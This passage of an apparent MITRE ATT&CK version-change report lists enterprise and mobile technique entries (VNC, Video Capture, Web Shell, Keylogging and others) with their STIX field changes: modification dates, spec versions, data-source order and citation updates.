external_references[3]['description'] | Apple Support. (n.d.). Set up a computer running VNC software for Remote Desktop. Retrieved August 18, 2021. | Tegan. (2019, August 15). Setting up System Authentication. Retrieved September 20, 2021.
external_references[3]['url'] | https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac | https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
external_references[4]['source_name'] | VNC Authentication | Hijacking VNC
external_references[4]['description'] | Tegan. (2019, August 15). Setting up System Authentication. Retrieved September 20, 2021. | Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute, Access and Crack). Retrieved September 20, 2021.
external_references[4]['url'] | https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication | https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
external_references[5]['source_name'] | Hijacking VNC | macOS root VNC login without authentication
external_references[5]['description'] | Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute, Access and Crack). Retrieved September 20, 2021. | Nick Miles. (2017, November 30). Detecting macOS High Sierra root account without authentication. Retrieved September 20, 2021.
external_references[5]['url'] | https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc | https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication
external_references[6]['source_name'] | macOS root VNC login without authentication | VNC Vulnerabilities
external_references[6]['description'] | Nick Miles. (2017, November 30). Detecting macOS High Sierra root account without authentication. Retrieved September 20, 2021. | Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities Found in Linux, Windows Solutions. Retrieved September 20, 2021.
external_references[6]['url'] | https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication | https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
external_references[7]['source_name'] | VNC Vulnerabilities | Offensive Security VNC Authentication Check
external_references[7]['description'] | Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities Found in Linux, Windows Solutions. Retrieved September 20, 2021. | Offensive Security. (n.d.). VNC Authentication. Retrieved October 6, 2021.
external_references[7]['url'] | https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/ | https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/
external_references[8]['source_name'] | Offensive Security VNC Authentication Check | Attacking VNC Servers PentestLab
external_references[8]['description'] | Offensive Security. (n.d.). VNC Authentication. Retrieved October 6, 2021. | Administrator, Penetration Testing Lab. (2012, October 30). Attacking VNC Servers. Retrieved October 6, 2021.
external_references[8]['url'] | https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/ | https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
external_references[9]['source_name'] | Attacking VNC Servers PentestLab | Havana authentication bug
external_references[9]['description'] | Administrator, Penetration Testing Lab. (2012, October 30). Attacking VNC Servers. Retrieved October 6, 2021. | Jay Pipes. (2013, December 23). Security Breach! Tenant A is seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021.
external_references[9]['url'] | https://pentestlab.blog/2012/10/30/attacking-vnc-servers/ | http://lists.openstack.org/pipermail/openstack/2013-December/004138.html
external_references[10]['source_name'] | Havana authentication bug | Apple Unified Log Analysis Remote Login and Screen Sharing
external_references[10]['description'] | Jay Pipes. (2013, December 23). Security Breach! Tenant A is seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021. | Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved August 19, 2021.
external_references[10]['url']http://lists.openstack.org/pipermail/openstack/2013-December/004138.htmlhttps://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
external_references[11]['source_name']Apple Unified Log Analysis Remote Login and Screen SharingGnome Remote Desktop grd-settings
external_references[11]['description']Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved August 19, 2021.Pascal Nowack. (n.d.). Retrieved September 21, 2021.
external_references[11]['url']https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-loginshttps://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207
external_references[12]['source_name']Gnome Remote Desktop grd-settingsGnome Remote Desktop gschema
external_references[12]['url']https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in
x_mitre_data_sources[1]Logon Session: Logon Session CreationNetwork Traffic: Network Connection Creation
x_mitre_data_sources[2]Network Traffic: Network Connection CreationLogon Session: Logon Session Creation
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'Gnome Remote Desktop gschema', 'description': 'Pascal Nowack. (n.d.). Retrieved September 21, 2021.', 'url': 'https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in'} | 

[T1125] Video Capture

Current version: 1.1

Dropped Mitigations:

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version | | 3.1.0
external_references | | Patrick Wardle. (n.d.). Retrieved March 20, 2018.
dictionary_item_removed
STIX Field | Old value | New Value
external_references | CAPEC-634 | 
values_changed
STIX Field | Old value | New Value
modified | 2022-03-15 20:06:04.793000+00:00 | 2023-03-30 21:01:37.205000+00:00
external_references[1]['source_name'] | capec | objective-see 2017 review
external_references[1]['url'] | https://capec.mitre.org/data/definitions/634.html | https://objective-see.com/blog/blog_0x25.html
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'objective-see 2017 review', 'description': 'Patrick Wardle. (n.d.). Retrieved March 20, 2018.', 'url': 'https://objective-see.com/blog/blog_0x25.html'} | 

[T1595.002] Active Scanning: Vulnerability Scanning

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version | | 3.1.0
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2021-04-15 03:20:09.446000+00:00 | 2023-03-13 20:46:31.907000+00:00
external_references[1]['description'] | OWASP Wiki. (2018, February 16). OAT-014 Vulnerability Scanning. Retrieved October 20, 2020. | OWASP. (n.d.). OAT-014 Vulnerability Scanning. Retrieved October 20, 2020.
external_references[1]['url'] | https://wiki.owasp.org/index.php/OAT-014_Vulnerability_Scanning | https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vulnerability_Scanning
x_mitre_data_sources[0] | Network Traffic: Network Traffic Content | Network Traffic: Network Traffic Flow
x_mitre_data_sources[1] | Network Traffic: Network Traffic Flow | Network Traffic: Network Traffic Content

[T1056.003] Input Capture: Web Portal Capture

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version | | 3.1.0
external_references | | Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.
dictionary_item_removed
STIX Field | Old value | New Value
external_references | CAPEC-569 | 
values_changed
STIX Field | Old value | New Value
modified | 2020-03-24 21:16:16.580000+00:00 | 2023-03-30 21:01:46.711000+00:00
external_references[1]['source_name'] | capec | Volexity Virtual Private Keylogging
external_references[1]['url'] | https://capec.mitre.org/data/definitions/569.html | https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'Volexity Virtual Private Keylogging', 'description': 'Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.', 'url': 'https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/'} | 

[T1550.004] Use Alternate Authentication Material: Web Session Cookie

Current version: 1.3

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version | | 3.1.0
external_references | | Rehberger, J. (2018, December). Pivot to the Cloud using Pass the Cookie. Retrieved April 5, 2019.
dictionary_item_removed
STIX Field | Old value | New Value
external_references | CAPEC-60 | 
values_changed
STIX Field | Old value | New Value
modified | 2021-10-12 14:22:09.650000+00:00 | 2023-03-30 21:01:51.836000+00:00
external_references[1]['source_name'] | capec | Pass The Cookie
external_references[1]['url'] | https://capec.mitre.org/data/definitions/60.html | https://wunderwuzzi23.github.io/blog/passthecookie.html
external_references[2]['source_name'] | Pass The Cookie | Unit 42 Mac Crypto Cookies January 2019
external_references[2]['description'] | Rehberger, J. (2018, December). Pivot to the Cloud using Pass the Cookie. Retrieved April 5, 2019. | Chen, Y., Hu, W., Xu, Z., et. al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges’ Cookies. Retrieved October 14, 2019.
external_references[2]['url'] | https://wunderwuzzi23.github.io/blog/passthecookie.html | https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
x_mitre_data_sources[0] | Web Credential: Web Credential Usage | Application Log: Application Log Content
x_mitre_data_sources[1] | Application Log: Application Log Content | Web Credential: Web Credential Usage
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'Unit 42 Mac Crypto Cookies January 2019', 'description': 'Chen, Y., Hu, W., Xu, Z., et. al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges’ Cookies. Retrieved October 14, 2019.', 'url': 'https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/'} | 

[T1505.003] Server Software Component: Web Shell

Current version: 1.3

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-10-19 20:11:07.800000+00:00 | 2023-03-30 21:01:53.223000+00:00
x_mitre_data_sources[0] | Network Traffic: Network Traffic Content | Process: Process Creation
x_mitre_data_sources[1] | File: File Modification | Network Traffic: Network Traffic Content
x_mitre_data_sources[2] | Network Traffic: Network Traffic Flow | Application Log: Application Log Content
x_mitre_data_sources[3] | Application Log: Application Log Content | Network Traffic: Network Traffic Flow
x_mitre_data_sources[5] | Process: Process Creation | File: File Modification
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/650.html', 'external_id': 'CAPEC-650'} | 

[T1547.004] Boot or Logon Autostart Execution: Winlogon Helper DLL

Current version: 1.0

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-20 16:32:14.691000+00:00 | 2023-03-30 21:01:47.069000+00:00
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/579.html', 'external_id': 'CAPEC-579'} | 

mobile-attack

Minor Version Changes

[T1626] Abuse Elevation Control Mechanism

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-05 16:53:29.994000+00:00 | 2023-03-15 16:23:59.281000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1517] Access Notifications

Current version: 1.2

Version changed from: 1.1 → 1.2

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-11 15:54:08.965000+00:00 | 2023-03-15 16:26:05.050000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.1 | 1.2

[T1640] Account Access Removal

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-06 13:29:47.590000+00:00 | 2023-03-15 16:34:51.917000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1638] Adversary-in-the-Middle

Current version: 2.1

Version changed from: 2.0 → 2.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-11 19:27:44.048000+00:00 | 2023-03-15 16:39:32.207000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 2.0 | 2.1

[T1429] Audio Capture

Current version: 3.1

Version changed from: 3.0 → 3.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-29 17:29:49.023000+00:00 | 2023-03-16 13:31:29.924000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 3.0 | 3.1

[T1481.002] Web Service: Bidirectional Communication

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-06 15:47:06.071000+00:00 | 2023-03-16 13:32:55.266000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1398] Boot or Logon Initialization Scripts

Current version: 2.1

Version changed from: 2.0 → 2.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-11 14:33:11.096000+00:00 | 2023-03-16 18:26:46.043000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 2.0 | 2.1

[T1624.001] Event Triggered Execution: Broadcast Receivers

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-19 16:49:10.650000+00:00 | 2023-03-16 18:27:42.752000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1636.001] Protected User Data: Calendar Entries

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-11 19:33:41.984000+00:00 | 2023-03-16 18:28:28.234000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1616] Call Control

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
external_references | | Google. (2021, August 11). Manifest.permission. Retrieved September 22, 2021.
external_references | | CEL-18
dictionary_item_removed
STIX Field | Old value | New Value
external_references | APP-41 | 
external_references | Google. (2021, August 11). Manifest.permission. Retrieved September 22, 2021. | 
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-16 18:31:37.189000+00:00
external_references[1]['source_name'] | NIST Mobile Threat Catalogue | Android Permissions
external_references[1]['url'] | https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-41.html | https://developer.android.com/reference/android/Manifest.permission
external_references[2]['url'] | https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-42.html | https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-41.html
external_references[2]['external_id'] | CEL-42 | APP-41
external_references[3]['url'] | https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-36.html | https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-42.html
external_references[3]['external_id'] | CEL-36 | CEL-42
external_references[4]['url'] | https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-18.html | https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-36.html
external_references[4]['external_id'] | CEL-18 | CEL-36
external_references[5]['source_name'] | Android Permissions | NIST Mobile Threat Catalogue
external_references[5]['url'] | https://developer.android.com/reference/android/Manifest.permission | https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-18.html
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1636.002] Protected User Data: Call Log

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-29 17:29:34.081000+00:00 | 2023-03-16 18:32:30.150000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1414] Clipboard Data

Current version: 3.1

Version changed from: 3.0 → 3.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-19 19:29:45.323000+00:00 | 2023-03-16 18:33:20.042000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 3.0 | 3.1

[T1632.001] Subvert Trust Controls: Code Signing Policy Modification

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-21 17:31:50.071000+00:00 | 2023-03-16 18:37:55.822000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1623] Command and Scripting Interpreter

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-06 12:14:24.393000+00:00 | 2023-03-20 15:16:19.547000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1645] Compromise Client Software Binary

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-08 15:38:38.744000+00:00 | 2023-03-20 15:20:11.752000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1474.002] Supply Chain Compromise: Compromise Hardware Supply Chain

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-05 16:40:45.961000+00:00 | 2023-03-20 15:21:12.603000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1474.001] Supply Chain Compromise: Compromise Software Dependencies and Development Tools

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-05 16:39:08.984000+00:00 | 2023-03-20 15:28:54.940000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1474.003] Supply Chain Compromise: Compromise Software Supply Chain

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-05 16:43:41.342000+00:00 | 2023-03-20 15:32:37.109000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1636.003] Protected User Data: Contact List

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-11 19:38:50.942000+00:00 | 2023-03-20 15:40:11.937000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1634] Credentials from Password Store

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-05 17:08:36.315000+00:00 | 2023-03-20 15:45:44.103000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1471] Data Encrypted for Impact

Current version: 3.2

Version changed from: 3.1 → 3.2

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-06 13:31:22.485000+00:00 | 2023-03-20 15:55:09.397000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 3.1 | 3.2

[T1641] Data Manipulation

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-06 13:35:57.044000+00:00 | 2023-03-20 15:55:32.497000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1481.001] Web Service: Dead Drop Resolver

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-06 15:41:03.914000+00:00 | 2023-03-20 15:56:04.790000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1626.001] Abuse Elevation Control Mechanism: Device Administrator Permissions

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-06 14:19:17.679000+00:00 | 2023-03-20 15:56:34.537000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1629.002] Impair Defenses: Device Lockout

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-05 16:59:33.363000+00:00 | 2023-03-20 18:39:10.201000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1629.003] Impair Defenses: Disable or Modify Tools

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-05 16:59:57.851000+00:00 | 2023-03-20 18:40:12.912000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1630.003] Indicator Removal on Host: Disguise Root/Jailbreak Indicators

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-11 15:46:23.223000+00:00 | 2023-03-20 18:18:29.556000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1407] Download New Code at Runtime

Current version: 1.4

Version changed from: 1.3 → 1.4

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-06 12:26:31.735000+00:00 | 2023-03-20 18:21:59.494000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.3 | 1.4

[T1456] Drive-By Compromise

Current version: 2.1

Version changed from: 2.0 → 2.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-19 15:32:30.837000+00:00 | 2023-03-20 18:24:56.530000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 2.0 | 2.1

[T1642] Endpoint Denial of Service

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-19 21:17:48.281000+00:00 | 2023-03-20 18:41:56.376000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1624] Event Triggered Execution

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-29 17:28:39.379000+00:00 | 2023-03-20 18:43:46.177000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1627] Execution Guardrails

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-11 15:08:20.821000+00:00 | 2023-03-20 18:44:26.317000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1404] Exploitation for Privilege Escalation

Current version: 2.1

Version changed from: 2.0 → 2.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-03-30 15:51:08.258000+00:00 | 2023-03-20 18:49:53.301000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 2.0 | 2.1

[T1428] Exploitation of Remote Services

Current version: 1.2

Version changed from: 1.1 → 1.2

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-06 12:45:44.023000+00:00 | 2023-03-20 18:51:07.651000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.1 | 1.2

[T1630.002] Indicator Removal on Host: File Deletion

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-21 17:32:45.989000+00:00 | 2023-03-20 18:52:24.758000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1420] File and Directory Discovery

Current version: 1.2

Version changed from: 1.1 → 1.2

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-19 19:52:12.345000+00:00 | 2023-03-20 18:53:35.087000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.1 | 1.2

[T1541] Foreground Persistence

Current version: 2.1

Version changed from: 2.0 → 2.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-08 15:38:03.160000+00:00 | 2023-03-20 18:54:25.564000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 2.0 | 2.1

[T1417.002] Input Capture: GUI Input Capture

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-05 19:48:31.195000+00:00 | 2023-03-20 18:55:51.676000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1643] Generate Traffic from Victim

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-06 13:55:14.390000+00:00 | 2023-03-20 18:57:17.144000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1627.001] Execution Guardrails: Geofencing

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-21 17:30:57.081000+00:00 | 2023-03-20 18:58:14.240000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1628] Hide Artifacts

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-08 15:44:24.536000+00:00 | 2023-03-20 18:59:57.485000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1625] Hijack Execution Flow

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-05 16:52:19.152000+00:00 | 2023-03-20 18:59:46.686000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1629] Impair Defenses

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-05 16:57:50.075000+00:00 | 2023-03-20 18:59:55.849000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1430.002] Location Tracking: Impersonate SS7 Nodes

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-10-21 13:44:56.301000+00:00 | 2023-03-20 18:41:45.256000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1630] Indicator Removal on Host

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-08 15:44:56.484000+00:00 | 2023-03-20 18:42:18.121000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1544] Ingress Tool Transfer

Current version: 2.1

Version changed from: 2.0 → 2.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-06 14:46:25.107000+00:00 | 2023-03-20 18:43:44.687000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 2.0 | 2.1

[T1417] Input Capture

Current version: 2.3

Version changed from: 2.2 → 2.3

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-11 18:48:26.111000+00:00 | 2023-03-20 18:44:36.145000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 2.2 | 2.3

[T1634.001] Credentials from Password Store: Keychain

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-05 17:09:03.861000+00:00 | 2023-03-20 18:45:39.362000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1417.001] Input Capture: Keylogging

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-19 19:37:19.862000+00:00 | 2023-03-20 18:48:39.936000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1

[T1430] Location Tracking

Current version: 1.2

Version changed from: 1.1 → 1.2

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-01 17:05:16.493000+00:00 | 2023-03-20 18:50:21.363000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.1 | 1.2

[T1464] Network Denial of Service

Current version: 1.3

Version changed from: 1.2 → 1.3

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-06 13:26:42.303000+00:00 | 2023-03-20 18:51:23.109000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.2 | 1.3

[T1509] Non-Standard Port

Current version: 2.1

Version changed from: 2.0 → 2.1

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-06 14:50:16.409000+00:00 | 2023-03-20 18:51:58.228000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 2.0 | 2.1

[T1481.003] Web Service: One-Way Communication

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
